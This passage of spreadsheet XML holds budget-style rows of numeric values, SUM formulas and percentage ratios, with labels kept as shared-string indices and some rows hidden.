      <c r="F489" s="174">
        <f t="shared" si="35"/>
        <v>42.17877094972067</v>
      </c>
      <c r="G489" s="172"/>
    </row>
    <row r="490" spans="1:7" ht="17.25" customHeight="1">
      <c r="A490" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B490" s="100">
        <v>0</v>
      </c>
      <c r="C490" s="100"/>
      <c r="D490" s="100">
        <v>0</v>
      </c>
      <c r="E490" s="173"/>
      <c r="F490" s="174"/>
      <c r="G490" s="172"/>
    </row>
    <row r="491" spans="1:7" ht="17.25" customHeight="1">
      <c r="A491" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B491" s="100">
        <v>0</v>
      </c>
      <c r="C491" s="100"/>
      <c r="D491" s="100">
        <v>0</v>
      </c>
      <c r="E491" s="173"/>
      <c r="F491" s="174"/>
      <c r="G491" s="172"/>
    </row>
    <row r="492" spans="1:7" ht="17.25" customHeight="1">
      <c r="A492" s="128" t="s">
        <v>698</v>
      </c>
      <c r="B492" s="100">
        <v>223</v>
      </c>
      <c r="C492" s="100">
        <v>223</v>
      </c>
      <c r="D492" s="100">
        <v>241</v>
      </c>
      <c r="E492" s="173">
        <v>241</v>
      </c>
      <c r="F492" s="174">
        <f t="shared" si="35"/>
        <v>108.07174887892377</v>
      </c>
      <c r="G492" s="172"/>
    </row>
    <row r="493" spans="1:7" ht="17.25" customHeight="1">
      <c r="A493" s="128" t="s">
        <v>699</v>
      </c>
      <c r="B493" s="100">
        <v>0</v>
      </c>
      <c r="C493" s="100"/>
      <c r="D493" s="100">
        <v>0</v>
      </c>
      <c r="E493" s="173"/>
      <c r="F493" s="174"/>
      <c r="G493" s="172"/>
    </row>
    <row r="494" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A494" s="128" t="s">
        <v>700</v>
      </c>
      <c r="B494" s="100">
        <v>0</v>
      </c>
      <c r="C494" s="100"/>
      <c r="D494" s="100">
        <v>0</v>
      </c>
      <c r="E494" s="173"/>
      <c r="F494" s="174"/>
      <c r="G494" s="172"/>
    </row>
    <row r="495" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A495" s="128" t="s">
        <v>701</v>
      </c>
      <c r="B495" s="100">
        <v>0</v>
      </c>
      <c r="C495" s="100"/>
      <c r="D495" s="100">
        <v>0</v>
      </c>
      <c r="E495" s="173"/>
      <c r="F495" s="174"/>
      <c r="G495" s="172"/>
    </row>
    <row r="496" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A496" s="128" t="s">
        <v>702</v>
      </c>
      <c r="B496" s="100">
        <v>0</v>
      </c>
      <c r="C496" s="100"/>
      <c r="D496" s="100">
        <v>0</v>
      </c>
      <c r="E496" s="173"/>
      <c r="F496" s="174"/>
      <c r="G496" s="172"/>
    </row>
    <row r="497" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A497" s="128" t="s">
        <v>703</v>
      </c>
      <c r="B497" s="100">
        <v>0</v>
      </c>
      <c r="C497" s="100"/>
      <c r="D497" s="100">
        <v>0</v>
      </c>
      <c r="E497" s="173"/>
      <c r="F497" s="174"/>
      <c r="G497" s="172"/>
    </row>
    <row r="498" spans="1:7" ht="17.25" customHeight="1">
      <c r="A498" s="128" t="s">
        <v>704</v>
      </c>
      <c r="B498" s="100">
        <v>0</v>
      </c>
      <c r="C498" s="100"/>
      <c r="D498" s="100">
        <v>158</v>
      </c>
      <c r="E498" s="173"/>
      <c r="F498" s="174"/>
      <c r="G498" s="172"/>
    </row>
    <row r="499" spans="1:7" ht="17.25" customHeight="1">
      <c r="A499" s="128" t="s">
        <v>705</v>
      </c>
      <c r="B499" s="100">
        <f>SUM(B500:B507)</f>
        <v>283</v>
      </c>
      <c r="C499" s="100">
        <f>SUM(C500:C507)</f>
        <v>283</v>
      </c>
      <c r="D499" s="100">
        <f>SUM(D500:D507)</f>
        <v>1135</v>
      </c>
      <c r="E499" s="173">
        <f>SUM(E500:E507)</f>
        <v>1135</v>
      </c>
      <c r="F499" s="174">
        <f>E499/C499*100</f>
        <v>401.06007067137807</v>
      </c>
      <c r="G499" s="172"/>
    </row>
    <row r="500" spans="1:7" ht="17.25" customHeight="1">
      <c r="A500" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B500" s="100">
        <v>0</v>
      </c>
      <c r="C500" s="100"/>
      <c r="D500" s="100">
        <v>0</v>
      </c>
      <c r="E500" s="173"/>
      <c r="F500" s="174"/>
      <c r="G500" s="172"/>
    </row>
    <row r="501" spans="1:7" ht="17.25" customHeight="1">
      <c r="A501" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B501" s="100">
        <v>0</v>
      </c>
      <c r="C501" s="100"/>
      <c r="D501" s="100">
        <v>0</v>
      </c>
      <c r="E501" s="173"/>
      <c r="F501" s="174"/>
      <c r="G501" s="172"/>
    </row>
    <row r="502" spans="1:7" ht="17.25" customHeight="1">
      <c r="A502" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B502" s="100">
        <v>0</v>
      </c>
      <c r="C502" s="100"/>
      <c r="D502" s="100">
        <v>0</v>
      </c>
      <c r="E502" s="173"/>
      <c r="F502" s="174"/>
      <c r="G502" s="172"/>
    </row>
    <row r="503" spans="1:7" ht="17.25" customHeight="1">
      <c r="A503" s="128" t="s">
        <v>706</v>
      </c>
      <c r="B503" s="100">
        <v>0</v>
      </c>
      <c r="C503" s="100"/>
      <c r="D503" s="100">
        <v>0</v>
      </c>
      <c r="E503" s="173"/>
      <c r="F503" s="174"/>
      <c r="G503" s="172"/>
    </row>
    <row r="504" spans="1:7" ht="17.25" customHeight="1">
      <c r="A504" s="128" t="s">
        <v>707</v>
      </c>
      <c r="B504" s="100">
        <v>283</v>
      </c>
      <c r="C504" s="100">
        <v>283</v>
      </c>
      <c r="D504" s="100">
        <v>1135</v>
      </c>
      <c r="E504" s="173">
        <v>1135</v>
      </c>
      <c r="F504" s="174">
        <f aca="true" t="shared" si="36" ref="F504:F509">E504/C504*100</f>
        <v>401.06007067137807</v>
      </c>
      <c r="G504" s="172" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="505" spans="1:7" ht="17.25" customHeight="1">
      <c r="A505" s="128" t="s">
        <v>709</v>
      </c>
      <c r="B505" s="100">
        <v>0</v>
      </c>
      <c r="C505" s="100"/>
      <c r="D505" s="100">
        <v>0</v>
      </c>
      <c r="E505" s="173"/>
      <c r="F505" s="174"/>
      <c r="G505" s="172"/>
    </row>
    <row r="506" spans="1:7" ht="17.25" customHeight="1">
      <c r="A506" s="128" t="s">
        <v>710</v>
      </c>
      <c r="B506" s="100">
        <v>0</v>
      </c>
      <c r="C506" s="100"/>
      <c r="D506" s="100">
        <v>0</v>
      </c>
      <c r="E506" s="173"/>
      <c r="F506" s="174"/>
      <c r="G506" s="172"/>
    </row>
    <row r="507" spans="1:7" ht="17.25" customHeight="1">
      <c r="A507" s="128" t="s">
        <v>711</v>
      </c>
      <c r="B507" s="100">
        <v>0</v>
      </c>
      <c r="C507" s="100"/>
      <c r="D507" s="100">
        <v>0</v>
      </c>
      <c r="E507" s="173"/>
      <c r="F507" s="174"/>
      <c r="G507" s="172"/>
    </row>
    <row r="508" spans="1:7" ht="17.25" customHeight="1">
      <c r="A508" s="128" t="s">
        <v>712</v>
      </c>
      <c r="B508" s="100">
        <f>SUM(B509:B515)</f>
        <v>4011</v>
      </c>
      <c r="C508" s="100">
        <f>SUM(C509:C515)</f>
        <v>3860</v>
      </c>
      <c r="D508" s="100">
        <f>SUM(D509:D515)</f>
        <v>3865</v>
      </c>
      <c r="E508" s="173">
        <f>SUM(E509:E515)</f>
        <v>3865</v>
      </c>
      <c r="F508" s="174">
        <f t="shared" si="36"/>
        <v>100.12953367875647</v>
      </c>
      <c r="G508" s="172"/>
    </row>
    <row r="509" spans="1:7" ht="17.25" customHeight="1">
      <c r="A509" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B509" s="100">
        <v>3800</v>
      </c>
      <c r="C509" s="100">
        <v>3800</v>
      </c>
      <c r="D509" s="100">
        <v>3532</v>
      </c>
      <c r="E509" s="173">
        <v>3532</v>
      </c>
      <c r="F509" s="174">
        <f t="shared" si="36"/>
        <v>92.94736842105263</v>
      </c>
      <c r="G509" s="172"/>
    </row>
    <row r="510" spans="1:7" ht="17.25" customHeight="1">
      <c r="A510" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B510" s="100">
        <v>0</v>
      </c>
      <c r="C510" s="100"/>
      <c r="D510" s="100">
        <v>0</v>
      </c>
      <c r="E510" s="173"/>
      <c r="F510" s="174"/>
      <c r="G510" s="172"/>
    </row>
    <row r="511" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A511" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B511" s="100">
        <v>0</v>
      </c>
      <c r="C511" s="100"/>
      <c r="D511" s="100">
        <v>0</v>
      </c>
      <c r="E511" s="173"/>
      <c r="F511" s="174"/>
      <c r="G511" s="172"/>
    </row>
    <row r="512" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A512" s="128" t="s">
        <v>713</v>
      </c>
      <c r="B512" s="100">
        <v>0</v>
      </c>
      <c r="C512" s="100"/>
      <c r="D512" s="100">
        <v>0</v>
      </c>
      <c r="E512" s="173"/>
      <c r="F512" s="174"/>
      <c r="G512" s="172"/>
    </row>
    <row r="513" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A513" s="128" t="s">
        <v>714</v>
      </c>
      <c r="B513" s="100">
        <v>0</v>
      </c>
      <c r="C513" s="100"/>
      <c r="D513" s="100">
        <v>0</v>
      </c>
      <c r="E513" s="173"/>
      <c r="F513" s="174"/>
      <c r="G513" s="172"/>
    </row>
    <row r="514" spans="1:7" ht="17.25" customHeight="1">
      <c r="A514" s="128" t="s">
        <v>715</v>
      </c>
      <c r="B514" s="100"/>
      <c r="C514" s="100"/>
      <c r="D514" s="100">
        <v>0</v>
      </c>
      <c r="E514" s="173"/>
      <c r="F514" s="174"/>
      <c r="G514" s="172"/>
    </row>
    <row r="515" spans="1:7" ht="17.25" customHeight="1">
      <c r="A515" s="128" t="s">
        <v>716</v>
      </c>
      <c r="B515" s="100">
        <v>211</v>
      </c>
      <c r="C515" s="100">
        <v>60</v>
      </c>
      <c r="D515" s="100">
        <v>333</v>
      </c>
      <c r="E515" s="173">
        <v>333</v>
      </c>
      <c r="F515" s="174">
        <f>E515/C515*100</f>
        <v>555</v>
      </c>
      <c r="G515" s="172" t="s">
        <v>717</v>
      </c>
    </row>
    <row r="516" spans="1:7" ht="17.25" customHeight="1">
      <c r="A516" s="128" t="s">
        <v>718</v>
      </c>
      <c r="B516" s="100">
        <f>SUM(B517:B519)</f>
        <v>1130</v>
      </c>
      <c r="C516" s="100">
        <f>SUM(C517:C519)</f>
        <v>0</v>
      </c>
      <c r="D516" s="100">
        <f>SUM(D517:D519)</f>
        <v>1847</v>
      </c>
      <c r="E516" s="173">
        <f>SUM(E517:E519)</f>
        <v>0</v>
      </c>
      <c r="F516" s="174"/>
      <c r="G516" s="172"/>
    </row>
    <row r="517" spans="1:7" ht="17.25" customHeight="1">
      <c r="A517" s="128" t="s">
        <v>719</v>
      </c>
      <c r="B517" s="100">
        <v>190</v>
      </c>
      <c r="C517" s="100"/>
      <c r="D517" s="100">
        <v>115</v>
      </c>
      <c r="E517" s="173"/>
      <c r="F517" s="174"/>
      <c r="G517" s="172"/>
    </row>
    <row r="518" spans="1:7" ht="17.25" customHeight="1">
      <c r="A518" s="128" t="s">
        <v>720</v>
      </c>
      <c r="B518" s="100">
        <v>0</v>
      </c>
      <c r="C518" s="100"/>
      <c r="D518" s="100">
        <v>0</v>
      </c>
      <c r="E518" s="173"/>
      <c r="F518" s="174"/>
      <c r="G518" s="172"/>
    </row>
    <row r="519" spans="1:7" ht="17.25" customHeight="1">
      <c r="A519" s="128" t="s">
        <v>721</v>
      </c>
      <c r="B519" s="100">
        <v>940</v>
      </c>
      <c r="C519" s="100"/>
      <c r="D519" s="100">
        <v>1732</v>
      </c>
      <c r="E519" s="173"/>
      <c r="F519" s="174"/>
      <c r="G519" s="172"/>
    </row>
    <row r="520" spans="1:7" ht="17.25" customHeight="1">
      <c r="A520" s="128" t="s">
        <v>722</v>
      </c>
      <c r="B520" s="100">
        <f>SUM(B521,B535,B543,B545,B553,B557,B567,B575,B582,B590,B599,B604,B607,B610,B613,B616,B619,B623,B628,B636,B639)</f>
        <v>39617</v>
      </c>
      <c r="C520" s="100">
        <f>SUM(C521,C535,C543,C545,C553,C557,C567,C575,C582,C590,C599,C604,C607,C610,C613,C616,C619,C623,C628,C636,C639)</f>
        <v>28723</v>
      </c>
      <c r="D520" s="100">
        <f>SUM(D521,D535,D543,D545,D553,D557,D567,D575,D582,D590,D599,D604,D607,D610,D613,D616,D619,D623,D628,D636,D639)</f>
        <v>46293</v>
      </c>
      <c r="E520" s="173">
        <f>SUM(E521,E535,E543,E545,E553,E557,E567,E575,E582,E590,E599,E604,E607,E610,E613,E616,E619,E623,E628,E636,E639)</f>
        <v>29364</v>
      </c>
      <c r="F520" s="174">
        <f aca="true" t="shared" si="37" ref="F520:F522">E520/C520*100</f>
        <v>102.23166103819239</v>
      </c>
      <c r="G520" s="172"/>
    </row>
    <row r="521" spans="1:7" ht="17.25" customHeight="1">
      <c r="A521" s="128" t="s">
        <v>723</v>
      </c>
      <c r="B521" s="100">
        <f>SUM(B522:B534)</f>
        <v>2277</v>
      </c>
      <c r="C521" s="100">
        <f>SUM(C522:C534)</f>
        <v>2277</v>
      </c>
      <c r="D521" s="100">
        <f>SUM(D522:D534)</f>
        <v>2970</v>
      </c>
      <c r="E521" s="173">
        <f>SUM(E522:E534)</f>
        <v>2970</v>
      </c>
      <c r="F521" s="174">
        <f t="shared" si="37"/>
        <v>130.43478260869566</v>
      </c>
      <c r="G521" s="172"/>
    </row>
    <row r="522" spans="1:7" ht="17.25" customHeight="1">
      <c r="A522" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B522" s="100">
        <v>1303</v>
      </c>
      <c r="C522" s="100">
        <v>1303</v>
      </c>
      <c r="D522" s="100">
        <v>1044</v>
      </c>
      <c r="E522" s="173">
        <v>1044</v>
      </c>
      <c r="F522" s="174">
        <f t="shared" si="37"/>
        <v>80.12279355333844</v>
      </c>
      <c r="G522" s="172"/>
    </row>
    <row r="523" spans="1:7" ht="17.25" customHeight="1">
      <c r="A523" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B523" s="100">
        <v>0</v>
      </c>
      <c r="C523" s="100"/>
      <c r="D523" s="100">
        <v>0</v>
      </c>
      <c r="E523" s="173"/>
      <c r="F523" s="174"/>
      <c r="G523" s="172"/>
    </row>
    <row r="524" spans="1:7" ht="17.25" customHeight="1">
      <c r="A524" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B524" s="100">
        <v>0</v>
      </c>
      <c r="C524" s="100"/>
      <c r="D524" s="100">
        <v>0</v>
      </c>
      <c r="E524" s="173"/>
      <c r="F524" s="174"/>
      <c r="G524" s="172"/>
    </row>
    <row r="525" spans="1:7" ht="17.25" customHeight="1">
      <c r="A525" s="128" t="s">
        <v>724</v>
      </c>
      <c r="B525" s="100">
        <v>0</v>
      </c>
      <c r="C525" s="100"/>
      <c r="D525" s="100">
        <v>0</v>
      </c>
      <c r="E525" s="173"/>
      <c r="F525" s="174"/>
      <c r="G525" s="172"/>
    </row>
    <row r="526" spans="1:7" ht="17.25" customHeight="1">
      <c r="A526" s="128" t="s">
        <v>725</v>
      </c>
      <c r="B526" s="100">
        <v>0</v>
      </c>
      <c r="C526" s="100"/>
      <c r="D526" s="100">
        <v>20</v>
      </c>
      <c r="E526" s="173">
        <v>20</v>
      </c>
      <c r="F526" s="174"/>
      <c r="G526" s="172"/>
    </row>
    <row r="527" spans="1:7" ht="17.25" customHeight="1">
      <c r="A527" s="128" t="s">
        <v>726</v>
      </c>
      <c r="B527" s="100">
        <v>0</v>
      </c>
      <c r="C527" s="100"/>
      <c r="D527" s="100">
        <v>0</v>
      </c>
      <c r="E527" s="173"/>
      <c r="F527" s="174"/>
      <c r="G527" s="172"/>
    </row>
    <row r="528" spans="1:7" ht="17.25" customHeight="1">
      <c r="A528" s="128" t="s">
        <v>727</v>
      </c>
      <c r="B528" s="100">
        <v>0</v>
      </c>
      <c r="C528" s="100"/>
      <c r="D528" s="100">
        <v>0</v>
      </c>
      <c r="E528" s="173"/>
      <c r="F528" s="174"/>
      <c r="G528" s="172"/>
    </row>
    <row r="529" spans="1:7" ht="17.25" customHeight="1">
      <c r="A529" s="128" t="s">
        <v>415</v>
      </c>
      <c r="B529" s="100">
        <v>0</v>
      </c>
      <c r="C529" s="100"/>
      <c r="D529" s="100">
        <v>100</v>
      </c>
      <c r="E529" s="173">
        <v>100</v>
      </c>
      <c r="F529" s="174"/>
      <c r="G529" s="172"/>
    </row>
    <row r="530" spans="1:7" ht="17.25" customHeight="1">
      <c r="A530" s="128" t="s">
        <v>728</v>
      </c>
      <c r="B530" s="100">
        <v>974</v>
      </c>
      <c r="C530" s="100">
        <v>974</v>
      </c>
      <c r="D530" s="100">
        <v>1783</v>
      </c>
      <c r="E530" s="173">
        <v>1783</v>
      </c>
      <c r="F530" s="174">
        <f>E530/C530*100</f>
        <v>183.05954825462013</v>
      </c>
      <c r="G530" s="172"/>
    </row>
    <row r="531" spans="1:7" ht="17.25" customHeight="1">
      <c r="A531" s="128" t="s">
        <v>729</v>
      </c>
      <c r="B531" s="100">
        <v>0</v>
      </c>
      <c r="C531" s="100"/>
      <c r="D531" s="100">
        <v>0</v>
      </c>
      <c r="E531" s="173"/>
      <c r="F531" s="174"/>
      <c r="G531" s="172"/>
    </row>
    <row r="532" spans="1:7" ht="17.25" customHeight="1">
      <c r="A532" s="128" t="s">
        <v>730</v>
      </c>
      <c r="B532" s="100">
        <v>0</v>
      </c>
      <c r="C532" s="100"/>
      <c r="D532" s="100">
        <v>15</v>
      </c>
      <c r="E532" s="173">
        <v>15</v>
      </c>
      <c r="F532" s="174"/>
      <c r="G532" s="172"/>
    </row>
    <row r="533" spans="1:7" ht="17.25" customHeight="1">
      <c r="A533" s="128" t="s">
        <v>731</v>
      </c>
      <c r="B533" s="100">
        <v>0</v>
      </c>
      <c r="C533" s="100"/>
      <c r="D533" s="100">
        <v>8</v>
      </c>
      <c r="E533" s="173">
        <v>8</v>
      </c>
      <c r="F533" s="174"/>
      <c r="G533" s="172"/>
    </row>
    <row r="534" spans="1:7" ht="17.25" customHeight="1">
      <c r="A534" s="128" t="s">
        <v>732</v>
      </c>
      <c r="B534" s="100">
        <v>0</v>
      </c>
      <c r="C534" s="100"/>
      <c r="D534" s="100">
        <v>0</v>
      </c>
      <c r="E534" s="173"/>
      <c r="F534" s="174"/>
      <c r="G534" s="172"/>
    </row>
    <row r="535" spans="1:7" ht="17.25" customHeight="1">
      <c r="A535" s="128" t="s">
        <v>733</v>
      </c>
      <c r="B535" s="100">
        <f>SUM(B536:B542)</f>
        <v>748</v>
      </c>
      <c r="C535" s="100">
        <f>SUM(C536:C542)</f>
        <v>748</v>
      </c>
      <c r="D535" s="100">
        <f>SUM(D536:D542)</f>
        <v>644</v>
      </c>
      <c r="E535" s="173">
        <f>SUM(E536:E542)</f>
        <v>644</v>
      </c>
      <c r="F535" s="174">
        <f aca="true" t="shared" si="38" ref="F535:F542">E535/C535*100</f>
        <v>86.09625668449198</v>
      </c>
      <c r="G535" s="172"/>
    </row>
    <row r="536" spans="1:7" ht="17.25" customHeight="1">
      <c r="A536" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B536" s="100">
        <v>428</v>
      </c>
      <c r="C536" s="100">
        <v>428</v>
      </c>
      <c r="D536" s="100">
        <v>394</v>
      </c>
      <c r="E536" s="173">
        <v>394</v>
      </c>
      <c r="F536" s="174">
        <f t="shared" si="38"/>
        <v>92.05607476635514</v>
      </c>
      <c r="G536" s="172"/>
    </row>
    <row r="537" spans="1:7" ht="17.25" customHeight="1">
      <c r="A537" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B537" s="100">
        <v>0</v>
      </c>
      <c r="C537" s="100"/>
      <c r="D537" s="100">
        <v>0</v>
      </c>
      <c r="E537" s="173"/>
      <c r="F537" s="174"/>
      <c r="G537" s="172"/>
    </row>
    <row r="538" spans="1:7" ht="17.25" customHeight="1">
      <c r="A538" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B538" s="100">
        <v>0</v>
      </c>
      <c r="C538" s="100"/>
      <c r="D538" s="100">
        <v>0</v>
      </c>
      <c r="E538" s="173"/>
      <c r="F538" s="174"/>
      <c r="G538" s="172"/>
    </row>
    <row r="539" spans="1:7" ht="17.25" customHeight="1">
      <c r="A539" s="128" t="s">
        <v>734</v>
      </c>
      <c r="B539" s="100">
        <v>0</v>
      </c>
      <c r="C539" s="100"/>
      <c r="D539" s="100">
        <v>0</v>
      </c>
      <c r="E539" s="173"/>
      <c r="F539" s="174"/>
      <c r="G539" s="172"/>
    </row>
    <row r="540" spans="1:7" ht="17.25" customHeight="1">
      <c r="A540" s="128" t="s">
        <v>735</v>
      </c>
      <c r="B540" s="100">
        <v>200</v>
      </c>
      <c r="C540" s="100">
        <v>200</v>
      </c>
      <c r="D540" s="100">
        <v>200</v>
      </c>
      <c r="E540" s="173">
        <v>200</v>
      </c>
      <c r="F540" s="174">
        <f t="shared" si="38"/>
        <v>100</v>
      </c>
      <c r="G540" s="172"/>
    </row>
    <row r="541" spans="1:7" ht="17.25" customHeight="1">
      <c r="A541" s="128" t="s">
        <v>736</v>
      </c>
      <c r="B541" s="100">
        <v>20</v>
      </c>
      <c r="C541" s="100">
        <v>20</v>
      </c>
      <c r="D541" s="100">
        <v>50</v>
      </c>
      <c r="E541" s="173">
        <v>50</v>
      </c>
      <c r="F541" s="174">
        <f t="shared" si="38"/>
        <v>250</v>
      </c>
      <c r="G541" s="172"/>
    </row>
    <row r="542" spans="1:7" ht="17.25" customHeight="1">
      <c r="A542" s="128" t="s">
        <v>737</v>
      </c>
      <c r="B542" s="100">
        <v>100</v>
      </c>
      <c r="C542" s="100">
        <v>100</v>
      </c>
      <c r="D542" s="100">
        <v>0</v>
      </c>
      <c r="E542" s="173"/>
      <c r="F542" s="174">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="G542" s="172"/>
    </row>
    <row r="543" spans="1:7" ht="17.25" customHeight="1">
      <c r="A543" s="128" t="s">
        <v>738</v>
      </c>
      <c r="B543" s="100">
        <f>B544</f>
        <v>0</v>
      </c>
      <c r="C543" s="100">
        <f>C544</f>
        <v>0</v>
      </c>
      <c r="D543" s="100">
        <f>D544</f>
        <v>0</v>
      </c>
      <c r="E543" s="173">
        <f>E544</f>
        <v>0</v>
      </c>
      <c r="F543" s="174"/>
      <c r="G543" s="172"/>
    </row>
    <row r="544" spans="1:7" ht="17.25" customHeight="1">
      <c r="A544" s="128" t="s">
        <v>739</v>
      </c>
      <c r="B544" s="100"/>
      <c r="C544" s="100"/>
      <c r="D544" s="100">
        <v>0</v>
      </c>
      <c r="E544" s="173"/>
      <c r="F544" s="174"/>
      <c r="G544" s="172"/>
    </row>
    <row r="545" spans="1:7" ht="17.25" customHeight="1">
      <c r="A545" s="128" t="s">
        <v>740</v>
      </c>
      <c r="B545" s="100">
        <f>SUM(B546:B552)</f>
        <v>14574</v>
      </c>
      <c r="C545" s="100">
        <f>SUM(C546:C552)</f>
        <v>14574</v>
      </c>
      <c r="D545" s="100">
        <f>SUM(D546:D552)</f>
        <v>11583</v>
      </c>
      <c r="E545" s="173">
        <f>SUM(E546:E552)</f>
        <v>11583</v>
      </c>
      <c r="F545" s="174">
        <f>E545/C545*100</f>
        <v>79.47715109098394</v>
      </c>
      <c r="G545" s="172"/>
    </row>
    <row r="546" spans="1:7" ht="17.25" customHeight="1">
      <c r="A546" s="128" t="s">
        <v>741</v>
      </c>
      <c r="B546" s="100">
        <v>0</v>
      </c>
      <c r="C546" s="100"/>
      <c r="D546" s="100">
        <v>93</v>
      </c>
      <c r="E546" s="173">
        <v>93</v>
      </c>
      <c r="F546" s="174"/>
      <c r="G546" s="172"/>
    </row>
    <row r="547" spans="1:7" ht="17.25" customHeight="1">
      <c r="A547" s="128" t="s">
        <v>742</v>
      </c>
      <c r="B547" s="100">
        <v>0</v>
      </c>
      <c r="C547" s="100"/>
      <c r="D547" s="100">
        <v>3</v>
      </c>
      <c r="E547" s="173">
        <v>3</v>
      </c>
      <c r="F547" s="174"/>
      <c r="G547" s="172"/>
    </row>
    <row r="548" spans="1:7" ht="17.25" customHeight="1">
      <c r="A548" s="128" t="s">
        <v>743</v>
      </c>
      <c r="B548" s="100">
        <v>0</v>
      </c>
      <c r="C548" s="100"/>
      <c r="D548" s="100">
        <v>0</v>
      </c>
      <c r="E548" s="173"/>
      <c r="F548" s="174"/>
      <c r="G548" s="172"/>
    </row>
    <row r="549" spans="1:7" ht="17.25" customHeight="1">
      <c r="A549" s="128" t="s">
        <v>744</v>
      </c>
      <c r="B549" s="100">
        <f>15574-1000</f>
        <v>14574</v>
      </c>
      <c r="C549" s="100">
        <f>15574-1000</f>
        <v>14574</v>
      </c>
      <c r="D549" s="100">
        <v>11487</v>
      </c>
      <c r="E549" s="173">
        <v>11487</v>
      </c>
      <c r="F549" s="174">
        <f>E549/C549*100</f>
        <v>78.81844380403457</v>
      </c>
      <c r="G549" s="172"/>
    </row>
    <row r="550" spans="1:7" ht="17.25" customHeight="1">
      <c r="A550" s="128" t="s">
        <v>745</v>
      </c>
      <c r="B550" s="100">
        <v>0</v>
      </c>
      <c r="C550" s="100"/>
      <c r="D550" s="100">
        <v>0</v>
      </c>
      <c r="E550" s="173"/>
      <c r="F550" s="174"/>
      <c r="G550" s="172"/>
    </row>
    <row r="551" spans="1:7" ht="17.25" customHeight="1">
      <c r="A551" s="128" t="s">
        <v>746</v>
      </c>
      <c r="B551" s="100">
        <v>0</v>
      </c>
      <c r="C551" s="100"/>
      <c r="D551" s="100">
        <v>0</v>
      </c>
      <c r="E551" s="173"/>
      <c r="F551" s="174"/>
      <c r="G551" s="172"/>
    </row>
    <row r="552" spans="1:7" ht="17.25" customHeight="1">
      <c r="A552" s="128" t="s">
        <v>747</v>
      </c>
      <c r="B552" s="100">
        <v>0</v>
      </c>
      <c r="C552" s="100"/>
      <c r="D552" s="100">
        <v>0</v>
      </c>
      <c r="E552" s="173"/>
      <c r="F552" s="174"/>
      <c r="G552" s="172"/>
    </row>
    <row r="553" spans="1:7" ht="17.25" customHeight="1">
      <c r="A553" s="128" t="s">
        <v>748</v>
      </c>
      <c r="B553" s="100">
        <f>SUM(B554:B556)</f>
        <v>2500</v>
      </c>
      <c r="C553" s="100">
        <f>SUM(C554:C556)</f>
        <v>2500</v>
      </c>
      <c r="D553" s="100">
        <f>SUM(D554:D556)</f>
        <v>5000</v>
      </c>
      <c r="E553" s="173">
        <f>SUM(E554:E556)</f>
        <v>5000</v>
      </c>
      <c r="F553" s="174">
        <f>E553/C553*100</f>
        <v>200</v>
      </c>
      <c r="G553" s="172"/>
    </row>
    <row r="554" spans="1:7" ht="17.25" customHeight="1">
      <c r="A554" s="128" t="s">
        <v>749</v>
      </c>
      <c r="B554" s="100"/>
      <c r="C554" s="100"/>
      <c r="D554" s="100">
        <v>0</v>
      </c>
      <c r="E554" s="173"/>
      <c r="F554" s="174"/>
      <c r="G554" s="172"/>
    </row>
    <row r="555" spans="1:7" ht="17.25" customHeight="1">
      <c r="A555" s="128" t="s">
        <v>750</v>
      </c>
      <c r="B555" s="100"/>
      <c r="C555" s="100"/>
      <c r="D555" s="100">
        <v>0</v>
      </c>
      <c r="E555" s="173"/>
      <c r="F555" s="174"/>
      <c r="G555" s="172"/>
    </row>
    <row r="556" spans="1:7" ht="17.25" customHeight="1">
      <c r="A556" s="128" t="s">
        <v>751</v>
      </c>
      <c r="B556" s="100">
        <v>2500</v>
      </c>
      <c r="C556" s="100">
        <v>2500</v>
      </c>
      <c r="D556" s="100">
        <v>5000</v>
      </c>
      <c r="E556" s="173">
        <v>5000</v>
      </c>
      <c r="F556" s="174">
        <f>E556/C556*100</f>
        <v>200</v>
      </c>
      <c r="G556" s="172"/>
    </row>
    <row r="557" spans="1:7" ht="17.25" customHeight="1">
      <c r="A557" s="128" t="s">
        <v>752</v>
      </c>
      <c r="B557" s="100">
        <f>SUM(B558:B566)</f>
        <v>7070</v>
      </c>
      <c r="C557" s="100">
        <f>SUM(C558:C566)</f>
        <v>0</v>
      </c>
      <c r="D557" s="100">
        <f>SUM(D558:D566)</f>
        <v>1273</v>
      </c>
      <c r="E557" s="173">
        <f>SUM(E558:E566)</f>
        <v>100</v>
      </c>
      <c r="F557" s="174"/>
      <c r="G557" s="172"/>
    </row>
    <row r="558" spans="1:7" ht="17.25" customHeight="1">
      <c r="A558" s="128" t="s">
        <v>753</v>
      </c>
      <c r="B558" s="100">
        <v>0</v>
      </c>
      <c r="C558" s="100"/>
      <c r="D558" s="100">
        <v>0</v>
      </c>
      <c r="E558" s="173"/>
      <c r="F558" s="174"/>
      <c r="G558" s="172"/>
    </row>
    <row r="559" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A559" s="128" t="s">
        <v>754</v>
      </c>
      <c r="B559" s="100">
        <v>0</v>
      </c>
      <c r="C559" s="100"/>
      <c r="D559" s="100">
        <v>0</v>
      </c>
      <c r="E559" s="173"/>
      <c r="F559" s="174"/>
      <c r="G559" s="172"/>
    </row>
    <row r="560" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A560" s="128" t="s">
        <v>755</v>
      </c>
      <c r="B560" s="100">
        <v>0</v>
      </c>
      <c r="C560" s="100"/>
      <c r="D560" s="100">
        <v>0</v>
      </c>
